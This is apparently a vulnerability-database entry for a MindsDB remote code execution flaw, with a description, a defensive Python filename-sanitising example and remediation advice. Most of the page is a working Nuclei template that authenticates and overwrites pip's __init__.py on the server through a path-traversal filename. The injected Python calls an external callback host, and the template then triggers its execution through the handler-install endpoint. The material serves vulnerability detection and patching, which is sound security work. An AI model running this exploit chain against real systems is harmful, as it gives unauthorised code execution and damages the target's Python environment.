
MindsDB - Remote Code Execution

CVE-2026-27483
Verified

Description

MindsDB before 25.9.1.1 contains a remote code execution vulnerability caused by path traversal in the /api/files upload module: an authenticated attacker can write arbitrary files on the server and thereby execute commands. Exploitation requires authentication.
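The root cause described above, shown from the defender's side as an added example (not MindsDB's code): a multipart filename is used to build a filesystem path without first being confined to the upload directory. The upload root and all filenames below are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed upload directory; MindsDB's real layout is not assumed here.
UPLOAD_ROOT = "/var/lib/app/uploads"


def naive_target(filename: str, root: str = UPLOAD_ROOT) -> str:
    """Vulnerable pattern: the client-supplied multipart filename is joined onto the
    upload root as-is, so '../' components (or an absolute path) walk out of it."""
    return posixpath.normpath(posixpath.join(root, filename))


def escapes_root(filename: str, root: str = UPLOAD_ROOT) -> bool:
    """True when naive_target() would resolve outside the upload root."""
    root = posixpath.normpath(root)
    return posixpath.commonpath([root, naive_target(filename, root)]) != root


def confined_target(filename: str, root: str = UPLOAD_ROOT) -> str:
    """Hardened pattern: percent-decode, treat backslashes as separators, keep only
    the final path component, then prove the result still lies under the root.
    Raises ValueError for anything that cannot be confined."""
    decoded = unquote(filename).replace("\\", "/")
    leaf = posixpath.basename(decoded)
    if leaf in ("", ".", "..") or "\x00" in leaf:
        raise ValueError(f"rejected filename: {filename!r}")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, leaf))
    # basename() already dropped every directory component; verify the containment
    # anyway so a future change to the sanitisation cannot silently reopen the hole.
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError(f"filename escapes upload root: {filename!r}")
    return candidate
```

The commonpath comparison, rather than a string-prefix check, is what stops a sibling directory such as uploads_evil from passing as "inside" the root.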

Severity

High

CVSS Score

8.8

Exploit Probability

23%

Affected Product

MindsDB

Published Date

March 6, 2026

Template Author

thewhiteh4t

CVE-2026-27483.yaml
id: CVE-2026-27483

info:
  name: MindsDB - Remote Code Execution
  author: thewhiteh4t
  severity: high
  description: |
    MindsDB before 25.9.1.1 contains a remote code execution vulnerability caused by path traversal in the /api/files upload module: an authenticated attacker can write arbitrary files on the server and thereby execute commands. Exploitation requires authentication.
  impact: |
    Authenticated attackers can execute arbitrary commands remotely by writing files to arbitrary paths on the server.
  remediation: |
    Upgrade to version 25.9.1.1 or later.
  reference:
    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
    - https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef
    - https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27483
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-27483
    epss-score: 0.23286
    epss-percentile: 0.96023
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: MindsDB
    product: MindsDB
    shodan-query: http.title:"MindsDB"
  tags: cve,cve2026,mindsdb,path-traversal,rce,oast,intrusive,unauth

variables:
  token: ""
  username: ""
  password: ""
  filename: "{{randstr}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/status"

    extractors:
      - type: regex
        name: mindsdb_version
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'
        internal: true

      - type: regex
        name: http_auth_enabled
        part: body
        group: 1
        regex:
          - '"http_auth_enabled":\s*(true|false)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "mindsdb_version")'
          - 'compare_versions(mindsdb_version, ">= 25.4.1.0", "< 25.9.1.1")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body, "token")'
          - 'status_code == 400 && contains(body, "Error in username or password")'
        condition: or
        internal: true

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - '{"token":\s*"([^"]+)"'
        internal: true

  - raw:
      - |
        PUT /api/files/{(unknown)} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Authorization: Bearer {{token}}
        Connection: close

        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="name"

        {(unknown)}
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="source"

        {(unknown)}
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="source_type"

        file
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
        Content-Type: text/plain

        import urllib.request
        urllib.request.urlopen('http://{{interactsh-url}}')
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "Not supported format")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/handlers/anomaly_detection/install HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(body, "Failed to install dependencies")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/status"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "mindsdb_version"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100e843ef163fd2fa0c03cf2e72d76487706e52be29499ac28a61cc37125fbb1241022057abb99f20ae91bdf98054fc969a5b1c7649430aea4469916d1803cda76076d6:922c64590222798bb761d5b6d8e72950
Score: 8.8

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2026-27483
CWE ID: CWE-22

References

https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef
https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1
https://nvd.nist.gov/vuln/detail/CVE-2026-27483

Remediation Steps

Upgrade to version 25.9.1.1 or later.